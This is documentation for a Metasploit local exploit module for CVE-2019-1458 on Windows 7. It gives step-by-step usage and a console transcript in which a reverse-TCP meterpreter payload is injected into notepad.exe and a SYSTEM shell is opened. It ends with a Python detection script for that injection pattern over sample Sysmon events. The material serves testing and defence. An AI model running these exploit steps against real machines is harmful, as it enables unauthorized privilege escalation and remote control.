Vulnerable Application
This module exploits CVE-2019-1458, a bug that occurs because a field within the tagSERVERINFO structure at *(gpsi+0x154) was uninitialized. This allowed user-mode attackers to set the extra window data pointer of a task switch window (designated by the FNID_SWITCH window class), a pointer that otherwise can only be set by the kernel. By setting this extra window data pointer, an attacker can write a limited amount of data to an arbitrary kernel address in memory, thus providing them with an arbitrary kernel write primitive that can be used to elevate privileges to SYSTEM.
This module has been tested against Windows 7 x64 SP1. Offsets within the solution may need to be adjusted to work with other versions of Windows.
Verification Steps
- Get a non-SYSTEM meterpreter session on Windows 7 x64
- use exploit/windows/local/ntusermessagecall
- set session <session>
- set payload windows/meterpreter/reverse_tcp
- set LHOST <LHOST>
- set LPORT 5555
- exploit
- Get a SYSTEM session
Scenarios
Windows 7 SP1 x64
msf5 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows User-PC\User @ USER-PC 192.168.56.1:4444 -> 192.168.56.6:49157 (192.168.56.6)
msf5 exploit(multi/handler) > use exploit/windows/local/ntusermessagecall
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/ntusermessagecall) > set session 1
session => 1
msf5 exploit(windows/local/ntusermessagecall) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/ntusermessagecall) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(windows/local/ntusermessagecall) > set LPORT 5555
LPORT => 5555
msf5 exploit(windows/local/ntusermessagecall) > run
[*] Started reverse TCP handler on 192.168.56.1:5555
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Launching notepad.exe to host the exploit...
[+] Process 1808 launched.
[*] Injecting exploit into 1808 ...
[*] Exploit injected. Injecting payload into 1808...
[*] Payload injected. Executing exploit...
[*] Sending stage (201283 bytes) to 192.168.56.6
[*] Meterpreter session 2 opened (192.168.56.1:5555 -> 192.168.56.6:49158) at 2020-07-10 17:10:54 +0800
meterpreter > sysinfo
Computer : USER-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_GB
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
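The transcript above shows the module launching notepad.exe as a host process and then injecting into it twice (exploit, then payload). The following detection logic is added here as an example and is not part of the module or its documentation; it flags that spawn-then-inject pattern over constructed Sysmon-style events (field names follow Sysmon's schema for Event ID 1 and 8; the PIDs and paths are made up).

```python
"""Detection logic for the host-process injection pattern visible in the
transcript above: a process launches notepad.exe and then creates remote
threads in it. Input is a list of constructed Sysmon-style events
(EventID 1 = process create, EventID 8 = CreateRemoteThread); field names
follow Sysmon's schema, all values are made up for this example."""
from collections import Counter

NOTEPAD = r"C:\Windows\System32\notepad.exe"
SUSPECT = r"C:\Users\User\AppData\Local\Temp\stager.exe"  # constructed path

# Constructed sample telemetry; PIDs and paths are not from a real host.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 1808, "Image": NOTEPAD,
     "ParentProcessId": 1532, "ParentImage": SUSPECT},
    {"EventID": 8, "SourceProcessId": 1532, "SourceImage": SUSPECT,
     "TargetProcessId": 1808, "TargetImage": NOTEPAD},            # exploit injected
    {"EventID": 8, "SourceProcessId": 1532, "SourceImage": SUSPECT,
     "TargetProcessId": 1808, "TargetImage": NOTEPAD},            # payload injected
    {"EventID": 1, "ProcessId": 2044, "Image": NOTEPAD,
     "ParentProcessId": 1200, "ParentImage": r"C:\Windows\explorer.exe"},  # benign
]


def find_spawn_and_inject(events, min_threads=1):
    """Return one alert per child process that its own parent later injects
    into via CreateRemoteThread. Spawning a host and immediately writing code
    into it is the behaviour the transcript shows; legitimate parents rarely
    create remote threads in the children they just started."""
    parent_of = {e["ProcessId"]: (e["ParentProcessId"], e["Image"])
                 for e in events if e["EventID"] == 1}
    hits = Counter()
    for e in events:
        if e["EventID"] != 8:
            continue
        tgt = e["TargetProcessId"]
        if tgt in parent_of and parent_of[tgt][0] == e["SourceProcessId"]:
            hits[(e["SourceProcessId"], e["SourceImage"], tgt, parent_of[tgt][1])] += 1
    return [{"source_pid": s, "source_image": si, "target_pid": t,
             "target_image": ti, "remote_threads": n}
            for (s, si, t, ti), n in hits.items() if n >= min_threads]


if __name__ == "__main__":
    for alert in find_spawn_and_inject(SAMPLE_EVENTS):
        print(alert)
```

The benign notepad.exe started by explorer.exe produces no alert because no process ever creates a remote thread in it.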